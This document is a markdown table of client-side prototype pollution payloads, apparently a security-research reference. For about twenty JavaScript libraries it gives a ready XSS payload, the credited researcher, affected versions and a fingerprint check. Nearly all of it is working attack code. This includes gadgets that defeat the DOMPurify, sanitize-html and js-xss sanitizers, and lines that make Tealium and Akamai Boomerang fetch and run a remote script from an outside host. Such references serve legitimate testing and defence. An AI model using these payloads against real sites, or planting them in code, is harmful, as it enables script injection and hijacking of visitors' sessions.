# Prototype Pollution Payloads

| **Library**                | **Payload**                                                                                                            | **Author**         | **Version**       | **Fingerprint**                                                      |
|----------------------------|------------------------------------------------------------------------------------------------------------------------|--------------------|------------------|-----------------------------------------------------------------------|
| **Wistia Embedded Video**  | `<script>Object.prototype.innerHTML = '<img/src/onerror=alert(1)>';</script>`                                           | William Bowling    | All versions     | `return (typeof wistiaEmbeds !== 'undefined')`                        |
| **$(x).off jQuery**        | `<script>Object.prototype.preventDefault='x'; Object.prototype.handleObj='x'; Object.prototype.delegateTarget='<img/src/onerror=alert(1)>'; /* No extra code needed for jQuery 1 & 2 */$(document).off('foobar');</script>` | Sergey Bobrov      | All versions     | `return (typeof $ !== 'undefined' && typeof $.fn !== 'undefined' && typeof $.fn.jquery !== 'undefined')` |
| **$(html) jQuery**         | `<script>Object.prototype.div=['1','<img src onerror=alert(1)>','1']</script><script>$('<div x="x"></div>')</script>` | Sergey Bobrov      | All versions     | `return (typeof $ !== 'undefined' && typeof $.fn !== 'undefined' && typeof $.fn.jquery !== 'undefined')` |
| **$.get jQuery**           | `<script>Object.prototype.url = ['data:,alert(1)//']; Object.prototype.dataType = 'script';</script><script>$.get('https://google.com/'); $.post('https://google.com/');</script>` | Michał Bentkowski | >= 3.0.0        | `return (typeof $ !== 'undefined' && typeof $.fn !== 'undefined' && typeof $.fn.jquery !== 'undefined')` |
| **$.getScript jQuery**     | `<script>Object.prototype.src = ['data:,alert(1)//']</script><script>$.getScript('https://google.com/')</script>` | s1r1us            | >= 3.4.0        | `return (typeof $ !== 'undefined' && typeof $.fn !== 'undefined' && typeof $.fn.jquery !== 'undefined')` |
| **$.getScript jQuery**     | `<script>Object.prototype.url = 'data:,alert(1)//'</script><script>$.getScript('https://google.com/')</script>` | s1r1us            | 3.0.0 - 3.3.1   | `return (typeof $ !== 'undefined' && typeof $.fn !== 'undefined' && typeof $.fn.jquery !== 'undefined')` |
| **Google reCAPTCHA**       | `<script>Object.prototype.srcdoc=['<script>alert(1)<\/script>']</script><div class="g-recaptcha" data-sitekey="your-site-key"/>` | s1r1us            |                  | `return (typeof recaptcha !== 'undefined')`                           |
| **Twitter Universal Website Tag** | `<script>Object.prototype.hif = ['javascript:alert(document.domain)'];</script>`                                 | Sergey Bobrov      |                  | `return (typeof twq !== 'undefined' && typeof twq.version !== 'undefined')` |
| **Tealium Universal Tag**  | `<script>Object.prototype.attrs = {src:1}; Object.prototype.src='https://portswigger-labs.net/xss/xss.js'</script>` | Sergey Bobrov      |                  | `return (typeof utag !== 'undefined' && typeof utag.id !== 'undefined')` |
| **Akamai Boomerang**       | `<script>Object.prototype.BOOMR = 1; Object.prototype.url='https://portswigger-labs.net/xss/xss.js'</script>`       | s1r1us            |                  | `return (typeof BOOMR !== 'undefined')`                              |
| **Lodash**                 | `<script>Object.prototype.sourceURL = '\u2028\u2029alert(1)'</script><script>_.template('test')</script>`          | Alex Brasetvik     | <= 4.17.15       | `return (typeof _ !== 'undefined' && typeof _.template !== 'undefined' && typeof _.VERSION !== 'undefined')` |
| **sanitize-html**          | `<script>Object.prototype['*'] = ['onload']</script><script>document.write(sanitizeHtml('<iframe onload=alert(1)>'))</script>` | Michał Bentkowski |                  | `return (typeof sanitizeHtml !== 'undefined')`                        |
| **js-xss**                 | `<script>Object.prototype.whiteList = {img: ['onerror', 'src']}</script><script>document.write(filterXSS('<img src onerror=alert(1)>'))</script>` | Michał Bentkowski |                  | `return (typeof filterXSS !== 'undefined')`                          |
| **DOMPurify**              | `<script>Object.prototype.ALLOWED_ATTR = ['onerror', 'src']</script><script>document.write(DOMPurify.sanitize('<img src onerror=alert(1)>'))</script>` | Michał Bentkowski | <= 2.0.12       | `return (typeof DOMPurify !== 'undefined')`                          |
| **DOMPurify**              | `<script>Object.prototype.documentMode = 9</script>`                                                                 | Michał Bentkowski | <= 2.0.12       | `return (typeof DOMPurify !== 'undefined')`                          |
| **Closure**                | `<script>const html = '<img src onerror=alert(1)>'; const sanitizer = new goog.html.sanitizer.HtmlSanitizer(); const sanitized = sanitizer.sanitize(html); const node = goog.dom.safeHtmlToNode(sanitized); document.body.append(node);</script>` | Michał Bentkowski |                  | `return (typeof goog !== 'undefined' && typeof goog.basePath !== 'undefined')` |
| **Closure**                | `<script>Object.prototype.CLOSURE_BASE_PATH = 'data:,alert(1)//';</script>`                                         | Michał Bentkowski |                  | `return (typeof goog !== 'undefined' && typeof goog.basePath !== 'undefined')` |
| **Marionette.js / Backbone.js** | `<script>Object.prototype.tagName = 'img'; Object.prototype.src = ['x:x']; Object.prototype.onerror = ['alert(1)']</script><script>(function() { var View = Mn.View.extend({template: '#template-layout'}); var App = Mn.Application.extend({region: '#app', onStart: function() {this.showView(new View());}}); var app = new App(); app.start(); })();</script><div id="template-layout" type="x-template/underscore">xxx</div>` | Sergey Bobrov      |                  | `return (typeof Marionette !== 'undefined') return (typeof Backbone !== 'undefined' && typeof Backbone.VERSION !== 'undefined')` |
| **Adobe Dynamic Tag Management** | `<script>Object.prototype.src='data:,alert(1)//'</script>`                                                          | Sergey Bobrov      |                  | `return (typeof _satellite !== 'undefined')`                         |
| **Embedly Cards**          | `<script>Object.prototype.onload = 'alert(1)'</script>`                                                                | Guilherme Keerok   |                  | `return (typeof window.embedly !== 'undefined')`                     |
| **Segment Analytics.js**   | `<script>Object.prototype.script = [1,'<img/src/onerror=alert(1)>','<img/src/onerror=alert(2)>']</script>`            | Sergey Bobrov      |                  | `return (typeof analytics !== 'undefined' && typeof analytics.SNIPPET_VERSION !== 'undefined')` |
